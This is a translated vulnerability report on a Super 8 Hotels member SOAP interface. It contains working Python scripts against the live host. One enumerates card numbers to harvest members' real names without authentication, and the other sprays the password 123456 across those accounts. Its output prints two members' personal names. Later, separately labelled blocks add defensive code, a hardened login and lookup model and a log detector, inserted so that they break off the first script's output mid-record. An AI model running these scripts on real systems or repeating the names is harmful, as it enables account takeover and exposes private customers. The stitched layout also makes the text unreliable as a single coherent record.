Feiyangfeng had already published "Super 8 Hotels: one location leaks a large amount of user data and order information"

The vendor ignored it, and WooYun later awarded it rank 13 (I found this while doing a reverse lookup before submitting). White hat Feiyangfeng approached it from the angle of app analysis, capturing and modifying requests with Burp; because of Burp's encoding the Chinese characters displayed incorrectly, and the vendor did not take it seriously. A year later, I stumbled upon a Super 8 Hotels interface through a Baidu search:

https://www0.super8.com.cn/mobileInterface/Super8Interface.asmx



Analysing Super 8's interfaces, I found that the SOAP interface neither checks permissions nor is restricted to internal access. Unauthenticated callers can therefore retrieve members' card numbers and real names, and once a card number is known the password can be brute-forced. Explanation and demonstration follow:

(screenshot omitted: the SOAP interface documentation page)

Super 8's documentation is actually very well done: entirely in Chinese and detailed. At the very bottom is getCustInfo:

Interface for querying the member entity by member card number (verifies the login password by phone number / member card number; on success returns the member card number, member name, member type and the member prices the member is entitled to).

Let's open it:

(screenshot omitted: the getCustInfo interface description)



In other words, as long as the member card number is valid, the interface returns the card number and the member's name; no password is required for this call.

The documentation even includes sample requests, which is really nice. So let's test it with the GET method; I wrote a simple Python script:

try:
    import requests
except ImportError:
    raise SystemExit('\n[!] requests模块导入错误,请执行pip install requests安装!')
from bs4 import BeautifulSoup

# Card numbers are issued consecutively, so a starting number plus an offset
# covers a block of cards.
START = 600130919
URL = 'https://www0.super8.com.cn/mobileInterface/Super8Interface.asmx/getCustInfo'

print('\n速八酒店会员卡验证\n')
for offset in range(1, 9):
    payload = {'cardNo': START + offset}
    s = requests.get(URL, params=payload)
    # The response is XML; the member record sits inside the <content> element.
    soup = BeautifulSoup(s.content, 'html.parser')
    print(soup.content)



The card number starts from 600130919. A quick note: I don't have a Super 8 member card myself; I found this picture of one via Baidu:

(image omitted: a Super 8 member card found via Baidu, card number 600110882)

600110882. During testing I iterated through 9999 cards; I chose this starting number for the brute-force demonstration (card number + real name; only the first 2 are shown for the demo). Program output:

速八酒店会员卡验证

<content>
  <cardno>600130920</cardno>
  <custname>马本惠</custname>
  <membertype>贵宾会员</membertype>
  <pricetypelist>
    <string>VIP</string>
    <string>EVIP</string>
    <string>WEB</string>
  </pricetypelist>
</content>
<content>
  <cardno>600130921</cardno>
  <custname>陈跃林</custname>
  <membertype>贵宾会员</membertype>
  <pricetypelist>
    <string>VIP</string>
    <string>EVIP</string>
    <string>WEB</string>
  </pricetypelist>
</content>
<content>
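The two defects the report exercises are an authorization gap in getCustInfo (any card number returns another member's record) and an unthrottled CustLoginEx login that lets one guessed password be tried against every card number. The following is an added example written for this page, not Super 8's code: a minimal in-memory model of both interfaces done the way a defender would want them. Login verifies a salted password hash, answers every failure with one generic error, and locks the account after repeated failures; the member lookup then requires a session token and only returns the record that belongs to that session. The class name, the lockout threshold, the member records and the passwords are all constructed for the example.

```python
# Added example, not Super 8's own code. Models CustLoginEx and getCustInfo
# with the checks the report shows missing. All member data is constructed.
import hashlib
import hmac
import os
import secrets

MAX_FAILURES = 5   # lockout threshold per account (assumed policy value)
# One response for "no such account", "wrong password" and "locked", so the
# login endpoint cannot be used to confirm which card numbers exist.
GENERIC_FAILURE = {"IsError": True, "ResultCode": "22", "Message": "invalid credentials"}


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


class MemberService:
    def __init__(self):
        self.members = {}    # cardNo -> record (including salt and password hash)
        self.failures = {}   # cardNo -> consecutive failed login attempts
        self.sessions = {}   # opaque session token -> cardNo it was issued to

    def add_member(self, card_no, cust_name, password):
        salt = os.urandom(16)
        self.members[card_no] = {
            "cardNo": card_no, "custName": cust_name, "membertype": "VIP",
            "salt": salt, "pw_hash": _hash_password(password, salt),
        }

    def cust_login(self, login_name, login_pwd):
        """Hardened CustLoginEx: generic failure message plus per-account lockout."""
        record = self.members.get(login_name)
        if record is None:
            # Spend the same hashing cost so timing does not reveal valid card numbers.
            _hash_password(login_pwd, b"\x00" * 16)
            return GENERIC_FAILURE
        if self.failures.get(login_name, 0) >= MAX_FAILURES:
            return GENERIC_FAILURE   # locked; production code would also alert
        candidate = _hash_password(login_pwd, record["salt"])
        if not hmac.compare_digest(candidate, record["pw_hash"]):
            self.failures[login_name] = self.failures.get(login_name, 0) + 1
            return GENERIC_FAILURE
        self.failures[login_name] = 0
        token = secrets.token_urlsafe(32)
        self.sessions[token] = login_name
        return {"IsError": False, "ResultCode": "00", "token": token,
                "Content": self._public(record)}

    def get_cust_info(self, token, card_no):
        """Hardened getCustInfo: authenticate first, then check the caller owns cardNo."""
        owner = self.sessions.get(token)
        if owner is None:
            return {"IsError": True, "ResultCode": "401", "Message": "not authenticated"}
        if owner != card_no:
            return {"IsError": True, "ResultCode": "403", "Message": "forbidden"}
        return {"IsError": False, "ResultCode": "00",
                "Content": self._public(self.members[card_no])}

    @staticmethod
    def _public(record):
        # Never return the salt or hash, only the fields the documented interface lists.
        return {k: record[k] for k in ("cardNo", "custName", "membertype")}


def demo():
    """Replays the report's two access patterns against the hardened service."""
    svc = MemberService()
    svc.add_member("600130920", "Member A", "correct-horse-battery")   # constructed
    svc.add_member("600130921", "Member B", "another-strong-pass")     # constructed
    results = {}
    # Anonymous lookup by card number, as the first script does: now refused.
    results["anon_lookup"] = svc.get_cust_info("no-token", "600130920")["ResultCode"]
    # One weak password tried against an account: generic error, then lockout.
    results["wrong_pw"] = svc.cust_login("600130920", "123456")["ResultCode"]
    for _ in range(MAX_FAILURES):
        svc.cust_login("600130920", "123456")
    results["locked_even_with_right_pw"] = svc.cust_login(
        "600130920", "correct-horse-battery")["ResultCode"]
    # Legitimate flow: log in, read own record, then attempt someone else's.
    login = svc.cust_login("600130921", "another-strong-pass")
    results["own_lookup"] = svc.get_cust_info(login["token"], "600130921")["ResultCode"]
    results["other_lookup"] = svc.get_cust_info(login["token"], "600130920")["ResultCode"]
    return results


if __name__ == "__main__":
    print(demo())
```

The point of the ownership check is that a card number is an identifier, not a secret: once the caller is tied to a session, the server compares the requested cardNo to the session's own cardNo rather than trusting the parameter. The lockout counter and the single generic error code are what turn the second script's loop into a dead end instead of a confirmation of which card numbers use 123456.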



With card numbers in hand, the password can be brute-forced; again I tested with a script.

Interface address:


https://www0.super8.com.cn/mobileInterface/Super8Interface.asmx?op=CustLoginEx

Interface description: CustLoginEx

Member login interface returning the member entity (verifies the login password by phone number / member card number; on success returns the member card number, member name, member type and the member prices the member is entitled to).

(screenshot omitted: the CustLoginEx interface description)



The script is as follows (it assumes the weak password 123456; it is just a quick sketch, and Python could equally read passwords from a file; this is only a demonstration):

try:
    import requests
except ImportError:
    raise SystemExit('\n[!] requests模块导入错误,请执行pip install requests安装!')

START = 600130919
URL = 'https://www0.super8.com.cn/mobileInterface/Super8Interface.asmx/CustLoginEx'

print('\n速八酒店会员用户登录验证\n')
for offset in range(1, 9):
    login_name = START + offset
    # The same guessed password is tried against each card number in the block.
    payload = {'loginName': login_name, 'loginPwd': '123456'}
    s = requests.get(URL, params=payload)
    print('\n正在测试:', login_name)
    print('\n' + s.text)



The test result is as follows (the script is crude and only meant to illustrate the problem; apologies):

速八酒店会员用户登录验证

正在测试: 600130920

<?xml version="1.0" encoding="utf-8"?>
<MessagePacketOfCustome xmlns:xsi="https://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="https://www.w3.org/2001/XMLSchema" xmlns="https://www.super8.com.cn/">
  <IsError>false</IsError>
  <ResultCode>00</ResultCode>
  <Message />
  <Content>
    <cardNo>600130920</cardNo>
    <custName>马本惠</custName>
    <membertype>贵宾会员</membertype>
    <pricetypelist>
      <string>VIP</string>
      <string>EVIP</string>
      <string>WEB</string>
    </pricetypelist>
  </Content>
  <CurTime>2015-02-19T20:15:32.3564357+08:00</CurTime>
</MessagePacketOfCustome>

正在测试: 600130921

<?xml version="1.0" encoding="utf-8"?>
<MessagePacketOfCustome xmlns:xsi="https://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="https://www.w3.org/2001/XMLSchema" xmlns="https://www.super8.com.cn/">
  <IsError>true</IsError>
  <ResultCode>22</ResultCode>
  <Message>鐢ㄦ埛鎴栧瘑鐮佷笉姝g‘</Message>
  <CurTime>2015-02-19T20:15:32.715238+08:00</CurTime>
</MessagePacketOfCustome>
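Both scripts above leave a distinctive trace on the server side: one source reading consecutive card numbers from getCustInfo, then the same source producing CustLoginEx failures (ResultCode 22, as in the output above) across many different accounts with one password. The following is an added example, not part of the original report, showing detection logic a defender could run over the hotel's own application logs to flag those two patterns. The log format and every log line are constructed for this example; only the operation names and the result codes 00 and 22 come from the report.

```python
# Added example, not from the original report. Flags card-number enumeration
# and single-password spraying in constructed application-log lines.
import re
from collections import defaultdict

# Assumed log format (constructed): timestamp, source IP, operation, account, result code.
LOG_RE = re.compile(
    r"^(?P<ts>\S+) ip=(?P<ip>\S+) op=(?P<op>\w+) "
    r"(?:cardNo|loginName)=(?P<acct>\d+) result=(?P<rc>\d+)$"
)

# Constructed sample lines: 203.0.113.5 walks consecutive card numbers and then
# tries one password across them; 198.51.100.7 is a member checking their own record.
SAMPLE_LOG = """\
2015-02-19T20:10:01 ip=203.0.113.5 op=getCustInfo cardNo=600130920 result=00
2015-02-19T20:10:01 ip=203.0.113.5 op=getCustInfo cardNo=600130921 result=00
2015-02-19T20:10:02 ip=203.0.113.5 op=getCustInfo cardNo=600130922 result=00
2015-02-19T20:10:02 ip=203.0.113.5 op=getCustInfo cardNo=600130923 result=00
2015-02-19T20:10:03 ip=203.0.113.5 op=getCustInfo cardNo=600130924 result=00
2015-02-19T20:11:00 ip=198.51.100.7 op=CustLoginEx loginName=600110882 result=00
2015-02-19T20:11:01 ip=198.51.100.7 op=getCustInfo cardNo=600110882 result=00
2015-02-19T20:15:32 ip=203.0.113.5 op=CustLoginEx loginName=600130920 result=00
2015-02-19T20:15:32 ip=203.0.113.5 op=CustLoginEx loginName=600130921 result=22
2015-02-19T20:15:33 ip=203.0.113.5 op=CustLoginEx loginName=600130922 result=22
2015-02-19T20:15:33 ip=203.0.113.5 op=CustLoginEx loginName=600130923 result=22
2015-02-19T20:15:34 ip=203.0.113.5 op=CustLoginEx loginName=600130924 result=22
"""


def parse(log_text):
    """Yield one dict per well-formed log line; malformed lines are skipped."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def longest_consecutive_run(sorted_nums):
    """Length of the longest run of n, n+1, n+2 ... in an ascending list."""
    best = cur = 1 if sorted_nums else 0
    for a, b in zip(sorted_nums, sorted_nums[1:]):
        cur = cur + 1 if b == a + 1 else 1
        best = max(best, cur)
    return best


def detect_enumeration(events, min_distinct=4):
    """Sources that read at least min_distinct consecutive card numbers -> run length."""
    per_ip = defaultdict(set)
    for e in events:
        if e["op"] == "getCustInfo":
            per_ip[e["ip"]].add(int(e["acct"]))
    hits = {}
    for ip, cards in per_ip.items():
        run = longest_consecutive_run(sorted(cards))
        if run >= min_distinct:
            hits[ip] = run
    return hits


def detect_spraying(events, min_accounts=3):
    """Sources whose failed logins (result 22) span at least min_accounts accounts."""
    failed = defaultdict(set)
    for e in events:
        if e["op"] == "CustLoginEx" and e["rc"] == "22":
            failed[e["ip"]].add(e["acct"])
    return {ip: len(accts) for ip, accts in failed.items() if len(accts) >= min_accounts}


def analyse(log_text):
    events = list(parse(log_text))
    return {"enumeration": detect_enumeration(events),
            "spraying": detect_spraying(events)}


if __name__ == "__main__":
    print(analyse(SAMPLE_LOG))
```

One caveat visible in the report's own output: the failed login still comes back as HTTP 200 with IsError true inside the XML body, so a web-server access log that records only status codes cannot separate successes from failures. The detection has to key on the application's result code (or the service has to be changed to signal failures at the HTTP layer), which is why the example parses an application log rather than an access log.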